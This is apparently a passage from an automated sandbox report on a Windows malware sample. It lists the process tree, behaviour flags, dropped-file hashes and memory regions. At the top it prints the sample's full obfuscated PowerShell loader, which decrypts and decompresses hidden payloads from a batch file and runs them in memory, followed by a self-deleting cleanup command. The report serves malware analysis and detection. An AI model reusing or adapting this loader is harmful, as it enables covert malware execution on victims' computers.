        "C:\Users\Admin\AppData\Roaming\iwebbh.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2804);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2932

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    2238871af228384f4b8cdc65117ba9f1

    SHA1

    2a200725f1f32e5a12546aa7fd7a8c5906757bd1

    SHA256

    daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882

    SHA512

    1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    b60e49309ee16b67c32abe452f30c738

    SHA1

    5796089f29b1c0f4f21e33c9f0c88c519dceb82a

    SHA256

    e848b213b0848179e13b05ab175c375a51b2e3a49e9595169d6b0c57636310ba

    SHA512

    25fb3e1ec76bcd78db175ea902b2040761bf2206a9914ec19b60dca313ee8df8ab10d9aa382094288926446ebf7f4610dbe25577e92671eef36adc65bc1d3ddd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    d8b9a260789a22d72263ef3bb119108c

    SHA1

    376a9bd48726f422679f2cd65003442c0b6f6dd5

    SHA256

    d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

    SHA512

    550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f52lcied.jvz.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\iwebbh.bat

    Filesize

    74KB

    MD5

    eb336ada634ab05e0ee2319de53f28d9

    SHA1

    6b90b17327236357996c2cda2e341a59bbe1177f

    SHA256

    ac9385e93103cf61717de999cb0e9ad035d311af09f0c02b1f46ef99fb5fa793

    SHA512

    dac81bce58bc4c76acdb8e0e3c1489cd822cd65de5aa7a5b1b61c2f11e85fce52a487cabdf6ceff6d78093fa5e9237f309f903cb32637fac062773480c643e95

  • C:\Users\Admin\AppData\Local\Temp\iwebbh.bat.exe

    Filesize

    423KB

    MD5

    c32ca4acfcc635ec1ea6ed8a34df5fac

    SHA1

    f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

    SHA256

    73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

    SHA512

    6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

  • C:\Users\Admin\AppData\Roaming\iwebbh.bat.exe

    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • memory/64-78-0x0000000075180000-0x0000000075930000-memory.dmp

    Filesize

    7.7MB

  • memory/64-47-0x00000000063F0000-0x0000000006482000-memory.dmp

    Filesize

    584KB

  • memory/64-35-0x0000000000400000-0x0000000000410000-memory.dmp

    Filesize

    64KB

  • memory/64-49-0x0000000006620000-0x0000000006686000-memory.dmp

    Filesize

    408KB

  • memory/64-79-0x00000000053A0000-0x00000000053B0000-memory.dmp

    Filesize

    64KB

  • memory/64-48-0x00000000063B0000-0x00000000063BA000-memory.dmp

    Filesize

    40KB

  • memory/64-43-0x0000000075180000-0x0000000075930000-memory.dmp

    Filesize

    7.7MB

  • memory/64-44-0x00000000053F0000-0x000000000548C000-memory.dmp

    Filesize

    624KB

  • memory/64-45-0x00000000053A0000-0x00000000053B0000-memory.dmp

    Filesize

    64KB

  • memory/64-46-0x00000000067C0000-0x0000000006D64000-memory.dmp

    Filesize

    5.6MB

  • memory/868-9-0x000001C831B70000-0x000001C831B92000-memory.dmp

    Filesize

    136KB

  • memory/868-42-0x00007FF831B00000-0x00007FF8325C1000-memory.dmp

    Filesize

    10.8MB

  • memory/868-19-0x00007FF831B00000-0x00007FF8325C1000-memory.dmp

    Filesize

    10.8MB

  • memory/868-20-0x000001C82FA50000-0x000001C82FA60000-memory.dmp

    Filesize

    64KB

  • memory/868-21-0x000001C82FA50000-0x000001C82FA60000-memory.dmp

    Filesize

    64KB

  • memory/1564-23-0x000001B43CC50000-0x000001B43CC60000-memory.dmp

    Filesize

    64KB

  • memory/1564-22-0x00007FF831B00000-0x00007FF8325C1000-memory.dmp

    Filesize

    10.8MB

  • memory/1564-38-0x00007FF831B00000-0x00007FF8325C1000-memory.dmp

    Filesize

    10.8MB

  • memory/1564-34-0x000001B467400000-0x000001B4676C0000-memory.dmp

    Filesize

    2.8MB

  • memory/1564-24-0x000001B43CC50000-0x000001B43CC60000-memory.dmp

    Filesize

    64KB

  • memory/1672-134-0x00000225B17D0000-0x00000225B17E0000-memory.dmp

    Filesize

    64KB

  • memory/1672-133-0x00000225B17D0000-0x00000225B17E0000-memory.dmp

    Filesize

    64KB

  • memory/1672-149-0x00007FF831B00000-0x00007FF8325C1000-memory.dmp

    Filesize

    10.8MB

  • memory/1672-132-0x00007FF831B00000-0x00007FF8325C1000-memory.dmp

    Filesize

    10.8MB

  • memory/2804-208-0x00007FF84EC50000-0x00007FF84ED0E000-memory.dmp

    Filesize

    760KB

  • memory/2804-195-0x00007FF832910000-0x00007FF8333D1000-memory.dmp

    Filesize

    10.8MB

  • memory/2804-196-0x0000024C29090000-0x0000024C290A0000-memory.dmp

    Filesize

    64KB

  • memory/2804-207-0x00007FF850A90000-0x00007FF850C85000-memory.dmp

    Filesize

    2.0MB

  • memory/2804-230-0x00007FF832910000-0x00007FF8333D1000-memory.dmp

    Filesize

    10.8MB

  • memory/2932-233-0x00007FF832910000-0x00007FF8333D1000-memory.dmp

    Filesize

    10.8MB

  • memory/2932-210-0x00007FF832910000-0x00007FF8333D1000-memory.dmp

    Filesize

    10.8MB

  • memory/2932-211-0x000001656CB30000-0x000001656CB40000-memory.dmp

    Filesize

    64KB

  • memory/4272-74-0x0000000006330000-0x0000000006684000-memory.dmp

    Filesize

    3.3MB

  • memory/4272-62-0x0000000002EF0000-0x0000000002F00000-memory.dmp

    Filesize

    64KB

  • memory/4272-58-0x0000000005280000-0x00000000052B6000-memory.dmp

    Filesize

    216KB

  • memory/4272-61-0x0000000002EF0000-0x0000000002F00000-memory.dmp

    Filesize

    64KB

  • memory/4272-60-0x00000000058F0000-0x0000000005F18000-memory.dmp

    Filesize

    6.2MB

  • memory/4272-59-0x0000000075180000-0x0000000075930000-memory.dmp

    Filesize

    7.7MB

  • memory/4272-63-0x0000000005820000-0x0000000005842000-memory.dmp

    Filesize

    136KB

  • memory/4272-64-0x0000000006110000-0x0000000006176000-memory.dmp

    Filesize

    408KB

  • memory/4272-86-0x0000000002EF0000-0x0000000002F00000-memory.dmp

    Filesize

    64KB

  • memory/4272-76-0x00000000066C0000-0x00000000066DE000-memory.dmp

    Filesize

    120KB

  • memory/4272-85-0x0000000002EF0000-0x0000000002F00000-memory.dmp

    Filesize

    64KB

  • memory/4272-84-0x0000000075180000-0x0000000075930000-memory.dmp

    Filesize

    7.7MB

  • memory/4272-77-0x0000000006770000-0x00000000067BC000-memory.dmp

    Filesize

    304KB

  • memory/4724-146-0x00007FF831B00000-0x00007FF8325C1000-memory.dmp

    Filesize

    10.8MB

  • memory/4724-107-0x00007FF831B00000-0x00007FF8325C1000-memory.dmp

    Filesize

    10.8MB

  • memory/4724-108-0x0000018D75A50000-0x0000018D75A60000-memory.dmp

    Filesize

    64KB

  • memory/4724-118-0x0000018D759C0000-0x0000018D759CA000-memory.dmp

    Filesize

    40KB

  • memory/4724-123-0x0000018D78100000-0x0000018D78116000-memory.dmp

    Filesize

    88KB

  • memory/4724-121-0x0000018D75A20000-0x0000018D75A32000-memory.dmp

    Filesize

    72KB

  • memory/4724-120-0x00007FF84EC50000-0x00007FF84ED0E000-memory.dmp

    Filesize

    760KB

  • memory/4724-119-0x00007FF850A90000-0x00007FF850C85000-memory.dmp

    Filesize

    2.0MB